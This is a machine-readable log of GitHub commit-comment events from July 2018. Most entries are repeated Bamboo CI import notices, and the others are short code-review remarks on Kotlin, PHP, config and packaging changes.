{"id":"7934389937","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634598,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-08T18:39:03Z","updated_at":"2018-07-08T18:39:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:39:03Z"}
{"id":"7934389962","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634599,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-08T18:39:05Z","updated_at":"2018-07-08T18:39:05Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-08T18:39:05Z"}
{"id":"7934390298","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29634600,"position":null,"line":null,"path":null,"commit_id":"eb0525e892219508d0c0e4602e835d5ddbacaf45","created_at":"2018-07-08T18:39:18Z","updated_at":"2018-07-08T18:39:18Z","author_association":"MEMBER","body":"and so the disaster began..."}},"created_at":"2018-07-08T18:39:18Z"}
{"id":"7934390332","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634601,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-08T18:39:19Z","updated_at":"2018-07-08T18:39:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:39:19Z"}
{"id":"7934390338","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634602,"position":25,"line":25,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/AnalogsViewHolder.kt","commit_id":"8d4d8eb8c26910fe71cf4497a644e373f2950a23","created_at":"2018-07-08T18:39:20Z","updated_at":"2018-07-08T18:39:20Z","author_association":"OWNER","body":"Такое, кстати, можно заменить на куда более простое `https://fantlab.ru/images/editions/big/${analog.id}` - схема с Uri крутая и правильная, но чересчур многословная."}},"created_at":"2018-07-08T18:39:20Z"}
{"id":"7934390911","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634603,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-08T18:39:47Z","updated_at":"2018-07-08T18:39:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:39:47Z"}
{"id":"7934391549","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634604,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-08T18:40:15Z","updated_at":"2018-07-08T18:40:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:40:15Z"}
{"id":"7934391876","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634605,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-08T18:40:28Z","updated_at":"2018-07-08T18:40:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:40:28Z"}
{"id":"7934392303","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634606,"position":88,"line":88,"path":"app/src/main/res/layouts/row_layouts/layout/work_analog_row_item.xml","commit_id":"8d4d8eb8c26910fe71cf4497a644e373f2950a23","created_at":"2018-07-08T18:40:43Z","updated_at":"2018-07-08T18:40:43Z","author_association":"OWNER","body":"И это тоже на свалку"}},"created_at":"2018-07-08T18:40:43Z"}
{"id":"7934392588","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634607,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-08T18:40:56Z","updated_at":"2018-07-08T18:40:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:40:56Z"}
{"id":"7934393099","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634608,"position":24,"line":40,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/analogs/WorkAnalogsPresenter.kt","commit_id":"dfaf51eb15ef9ca36788c8c7bba1b8a215ff6fc4","created_at":"2018-07-08T18:41:19Z","updated_at":"2018-07-08T18:41:19Z","author_association":"OWNER","body":"`sendToView {...}`"}},"created_at":"2018-07-08T18:41:19Z"}
{"id":"7934393202","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634609,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-08T18:41:26Z","updated_at":"2018-07-08T18:41:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:41:26Z"}
{"id":"7934393409","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634610,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-08T18:41:36Z","updated_at":"2018-07-08T18:41:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:41:36Z"}
{"id":"7934393880","type":"CommitCommentEvent","actor":{"login":"Tangol"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29634612,"position":null,"line":null,"path":null,"commit_id":"80ae0e8338229dbd8bea77601928a65f75e37cec","created_at":"2018-07-08T18:42:00Z","updated_at":"2018-07-08T18:42:00Z","author_association":"NONE","body":"Please note that the `ripple` effect should be removed from the 4 main tiles, as its usage is out of place there.\r\n\r\n![ripple](https://user-images.githubusercontent.com/3336728/42422868-8ecb3eda-82f7-11e8-9fed-200c91efcfb8.png)\r\n\r\nTested on https://github.com/villagedefrance/OpenCart-Overclocked/commit/e14466e6d3095f0ce0f0308d21a75c67446389e6"}},"created_at":"2018-07-08T18:42:00Z"}
{"id":"7934393918","type":"CommitCommentEvent","actor":{"login":"agelios765"},"repo":{"name":"ENiahu/blog"},"payload":{"comment":{"id":29634613,"position":6,"line":9,"path":"resources/views/about.blade.php","commit_id":"d96b7f31c9cf05f81494c82eef073f8030532e78","created_at":"2018-07-08T18:42:02Z","updated_at":"2018-07-08T18:42:02Z","author_association":"NONE","body":"Поміняй на {{ }} "}},"created_at":"2018-07-08T18:42:02Z"}
{"id":"7934394000","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634614,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-08T18:42:07Z","updated_at":"2018-07-08T18:42:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:42:07Z"}
{"id":"7934394654","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29634617,"position":null,"line":null,"path":null,"commit_id":"b9dea600519b4e82ed3c23dff1f8ce76c2eb0a76","created_at":"2018-07-08T18:42:36Z","updated_at":"2018-07-08T18:42:36Z","author_association":"MEMBER","body":"wmgUse and wgScore isn't alphabetical in this section. In fact this section is wmgUse config only."}},"created_at":"2018-07-08T18:42:36Z"}
{"id":"7934394667","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634618,"position":5,"line":64,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/editions/WorkEditionsFragment.kt","commit_id":"19a590e7f62a39b60b83dfca437789741183bc11","created_at":"2018-07-08T18:42:37Z","updated_at":"2018-07-08T18:42:37Z","author_association":"OWNER","body":"На самом деле можно не делать через `let` - просто меняешь `!!` на `?`"}},"created_at":"2018-07-08T18:42:37Z"}
{"id":"7934394710","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634619,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-08T18:42:39Z","updated_at":"2018-07-08T18:42:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:42:39Z"}
{"id":"7934394830","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634620,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-08T18:42:45Z","updated_at":"2018-07-08T18:42:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:42:45Z"}
{"id":"7934395225","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634621,"position":17,"line":22,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/overview/AuthorOverviewFragment.kt","commit_id":"e8421c537ca98123d2cd9d0c002ced9baaff1af2","created_at":"2018-07-08T18:43:07Z","updated_at":"2018-07-08T18:43:07Z","author_association":"OWNER","body":"`lateinit`"}},"created_at":"2018-07-08T18:43:07Z"}
{"id":"7934395459","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634622,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-08T18:43:17Z","updated_at":"2018-07-08T18:43:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:43:17Z"}
{"id":"7934395532","type":"CommitCommentEvent","actor":{"login":"avoidwork"},"repo":{"name":"avoidwork/tiny-httptest"},"payload":{"comment":{"id":29634623,"position":null,"line":null,"path":null,"commit_id":"f97e061fc73ef0cc9521d02c5fc817c5ad696f83","created_at":"2018-07-08T18:43:22Z","updated_at":"2018-07-08T18:43:22Z","author_association":"OWNER","body":"![smh](https://user-images.githubusercontent.com/369698/42422875-41b79e66-82bd-11e8-959d-e0bd6f7f15e0.gif)\r\n"}},"created_at":"2018-07-08T18:43:22Z"}
{"id":"7934396152","type":"CommitCommentEvent","actor":{"login":"sahandnayebaziz"},"repo":{"name":"hufort/Sprouted-Kitchen-Recipe-Card"},"payload":{"comment":{"id":29634628,"position":67,"line":124,"path":"viewsReact/recipeCard.jsx","commit_id":"90d1662e5f655d0f4469b586bf7f219c62da8447","created_at":"2018-07-08T18:43:50Z","updated_at":"2018-07-08T18:43:50Z","author_association":"COLLABORATOR","body":"@hufort looks good! This could definitely be cleaned up if you additively made up the HTML markup instead of committing to each of these keys at the end. Having to do `${nutrition}` even if there is no nutrition value is forcing you to add those placeholders for each, and to add variables for each key in several places  "}},"created_at":"2018-07-08T18:43:50Z"}
{"id":"7934397736","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634634,"position":51,"line":61,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/editions/AuthorEditionsFragment.kt","commit_id":"392e9ae85c7090ad5c4f692a0db814133c65447d","created_at":"2018-07-08T18:44:56Z","updated_at":"2018-07-08T18:44:56Z","author_association":"OWNER","body":"`let` тоже не нужен :) Просто `editionsBlocks?.forEach {...}`"}},"created_at":"2018-07-08T18:44:56Z"}
{"id":"7934398344","type":"CommitCommentEvent","actor":{"login":"sahandnayebaziz"},"repo":{"name":"hufort/Sprouted-Kitchen-Recipe-Card"},"payload":{"comment":{"id":29634638,"position":67,"line":124,"path":"viewsReact/recipeCard.jsx","commit_id":"90d1662e5f655d0f4469b586bf7f219c62da8447","created_at":"2018-07-08T18:45:20Z","updated_at":"2018-07-08T18:45:20Z","author_association":"COLLABORATOR","body":"that's the change I would make to this. Otherwise, it's looking good. Good looks on the \"display:none\"! 😎 "}},"created_at":"2018-07-08T18:45:20Z"}
{"id":"7934398348","type":"CommitCommentEvent","actor":{"login":"harry8242"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29634639,"position":null,"line":null,"path":null,"commit_id":"b07cf8ee5ebcd05c6d101f32fded79fd2ef4954c","created_at":"2018-07-08T18:45:20Z","updated_at":"2018-07-08T18:45:20Z","author_association":"NONE","body":"fyi trim props not required here since oreo enables it by default. also the values are same in fwb.\r\nhttps://review.lineageos.org/#/c/LineageOS/android_frameworks_base/+/208080/5/services/core/java/com/android/server/am/ActivityManagerConstants.java"}},"created_at":"2018-07-08T18:45:20Z"}
{"id":"7934399102","type":"CommitCommentEvent","actor":{"login":"gupi125"},"repo":{"name":"gupi125/gupi125.github.io"},"payload":{"comment":{"id":29634641,"position":null,"line":null,"path":null,"commit_id":"afcce3fe76c689fb9ea14ed234b24129273c1a76","created_at":"2018-07-08T18:45:48Z","updated_at":"2018-07-08T18:45:48Z","author_association":"OWNER","body":"asm"}},"created_at":"2018-07-08T18:45:48Z"}
{"id":"7934400033","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634645,"position":5,"line":62,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/overview/WorkOverviewFragment.kt","commit_id":"ba063cf1afec482425b4e767ac2a9900e4e8651b","created_at":"2018-07-08T18:46:26Z","updated_at":"2018-07-08T18:46:26Z","author_association":"OWNER","body":"`let` здесь не нужен - просто `work.description ?: getString(R.string.no_description)`"}},"created_at":"2018-07-08T18:46:26Z"}
{"id":"7934401260","type":"CommitCommentEvent","actor":{"login":"ewilde"},"repo":{"name":"ewilde/faas-ecs"},"payload":{"comment":{"id":29634647,"position":103,"line":103,"path":"CONTRIBUTING.md","commit_id":"c3b3ed4fe579974f72c3ba58043b732cf0777b6b","created_at":"2018-07-08T18:47:15Z","updated_at":"2018-07-08T18:47:15Z","author_association":"OWNER","body":"resolved, thanks for the comment!"}},"created_at":"2018-07-08T18:47:15Z"}
{"id":"7934401443","type":"CommitCommentEvent","actor":{"login":"mb11797"},"repo":{"name":"mb11797/captionate"},"payload":{"comment":{"id":29634648,"position":null,"line":null,"path":null,"commit_id":"786f3c4fd8d09b468d8082bb870a0a0a8f016739","created_at":"2018-07-08T18:47:22Z","updated_at":"2018-07-08T18:47:22Z","author_association":"OWNER","body":"Coco-API set up done."}},"created_at":"2018-07-08T18:47:22Z"}
{"id":"7934401664","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634650,"position":null,"line":null,"path":null,"commit_id":"ba063cf1afec482425b4e767ac2a9900e4e8651b","created_at":"2018-07-08T18:47:31Z","updated_at":"2018-07-08T18:47:31Z","author_association":"OWNER","body":"И в целом - наверное, просто не стоит выводить секции, если нет содержания. Как в данном случае с описанием"}},"created_at":"2018-07-08T18:47:31Z"}
{"id":"7934402288","type":"CommitCommentEvent","actor":{"login":"Felipe1993"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":29634651,"position":null,"line":null,"path":null,"commit_id":"50930048d7704dd02e945deb9b19b7e2e72539e5","created_at":"2018-07-08T18:47:55Z","updated_at":"2018-07-08T18:47:55Z","author_association":"NONE","body":"thanks @okk3 "}},"created_at":"2018-07-08T18:47:55Z"}
{"id":"7934403335","type":"CommitCommentEvent","actor":{"login":"LoupVaillant"},"repo":{"name":"LoupVaillant/Monocypher"},"payload":{"comment":{"id":29634656,"position":null,"line":null,"path":null,"commit_id":"79f8285ea6cae0db2e906bf3eb65c8fcadabdaf8","created_at":"2018-07-08T18:48:39Z","updated_at":"2018-07-08T18:48:39Z","author_association":"OWNER","body":"Oh… OK. Hmm… Should we revert the patch, or can we expect some exotic implementation will fail miserably there?"}},"created_at":"2018-07-08T18:48:39Z"}
{"id":"7934404087","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634658,"position":22,"line":22,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/WorksViewHolder.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:49:09Z","updated_at":"2018-07-08T18:49:09Z","author_association":"OWNER","body":"Здесь изображение вообще не нужно. Да и в целом позже библиографию переделаем - там и вложенность в циклах, и разделение по типам произведений должны быть."}},"created_at":"2018-07-08T18:49:09Z"}
{"id":"7934405443","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634663,"position":53,"line":53,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/WorksViewHolder.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:50:03Z","updated_at":"2018-07-08T18:50:03Z","author_association":"OWNER","body":"Можно проще: `work.year?.toString() ?: \"N/A\"`"}},"created_at":"2018-07-08T18:50:03Z"}
{"id":"7934406922","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634665,"position":38,"line":36,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/works/AuthorWorksFragment.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:51:03Z","updated_at":"2018-07-08T18:51:03Z","author_association":"OWNER","body":"Необязательно указывать выходной тип - компилятор его сам спокойно выводит. А если непонятно самому - в интерфейсе всегда указан фактический тип"}},"created_at":"2018-07-08T18:51:03Z"}
{"id":"7934407419","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634666,"position":54,"line":66,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/works/AuthorWorksFragment.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:51:23Z","updated_at":"2018-07-08T18:51:23Z","author_association":"OWNER","body":"Без `let` проще"}},"created_at":"2018-07-08T18:51:23Z"}
{"id":"7934410165","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634668,"position":54,"line":66,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/author/works/AuthorWorksFragment.kt","commit_id":"bb97be238ecbef90bc64ba29f224a3d1d18a357d","created_at":"2018-07-08T18:53:21Z","updated_at":"2018-07-08T18:53:21Z","author_association":"OWNER","body":"И, если не ошибаюсь, даже можно инвертировать: `adapter.addItems(works.worksBlocks.map { it.list })`"}},"created_at":"2018-07-08T18:53:21Z"}
{"id":"7934411041","type":"CommitCommentEvent","actor":{"login":"autrimpo"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29634672,"position":null,"line":null,"path":null,"commit_id":"ea662567b2d323aa4066af83670d0f281a7ac647","created_at":"2018-07-08T18:54:02Z","updated_at":"2018-07-08T18:54:02Z","author_association":"CONTRIBUTOR","body":"This update breaks bs1770gain, segfaults on calculating gain.\r\nI've contacted the author, hopefully it'll get fixed upstream.\r\nIf not, I might have a look at it myself."}},"created_at":"2018-07-08T18:54:02Z"}
